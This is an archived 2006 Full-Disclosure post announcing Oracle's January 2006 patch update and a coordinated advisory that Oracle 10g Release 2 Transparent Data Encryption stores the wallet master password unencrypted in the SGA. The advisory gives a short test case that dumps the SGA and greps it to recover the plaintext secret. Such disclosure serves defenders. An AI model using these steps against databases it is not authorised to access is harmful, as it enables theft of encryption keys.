| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1C09DF36EB7A3F489633C919E7413501A64E97@mapibe09.exchange.xchg> Date: Tue Jan 17 20:33:08 2006 From: ak at red-database-security.com (Kornbrust, Alexander) Subject: Oracle Database 10g Rel. 2- Transparent Data Encryption plaintext masterkey in SGA Hello FD reader Oracle released the first critical patch update for 2006 with bugfixes for 82 vulnerabilities. http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html Additional information concerning the Oracle January 2006 CPU is available here http://www.red-database-security.com/advisory/oracle_cpu_jan_2006.html The following URL contains information about the unencrypted TDE masterkey stored in the SGA http://www.red-database-security.com/advisory/oracle_tde_unencrypted_sga.html ######################################################################### Transparent Data Encryption stores key unencrypted in the SGA Name Transparent Data Encryption stores key unencrypted in the SGA Affected Oracle Database 10g Release 2 Severity High Risk Category Information disclosure Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Date 17 January 2005 (V 1.00) Oracle Bug 5802173 Time to fix 190 days Details The Oracle security feature "Transparent Data Encryption" is storing the masterkey unencrypted in the SGA. A skilled attacker or non-security DBA can retrieve the plaintext masterkey. Test case SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword"; System altered. SQL> exit Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 Production With the Partitioning, OLAP and Data Mining options [oracle@...10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin [oracle@...10201 /]$ cd /tmp [oracle@...10201 /]$ dumpsga [oracle@...10201 /]$ strings * | grep -iH secretpassword secretpassword secretpassword secretpassword [] Excerpt from the SGA /oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@...$d$^@...cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@...$d?d$- ^@^@...$L4^L?^Xp /?]/?<8f>^Dsecretpassword^@...U^B^@...?4^Lfile:/oracle/10.2.0/admin/ora10201/wallet [] Patch Information Oracle fixed this issue with the patches from the critical patch update january 2006 for Oracle 10g Release 2. History 11-jul-2005 Oracle secalert was informed 12-jul-2005 Bug confirmed 17-jan-2006 Oracle published the Critical Patch Update January 2006 (CPU January 2006) 17-jan-2006 Red-Database-Security published this advisory ? 2006 by Red-Database-Security GmbH http://www.red-database-security.com
Powered by blists - more mailing lists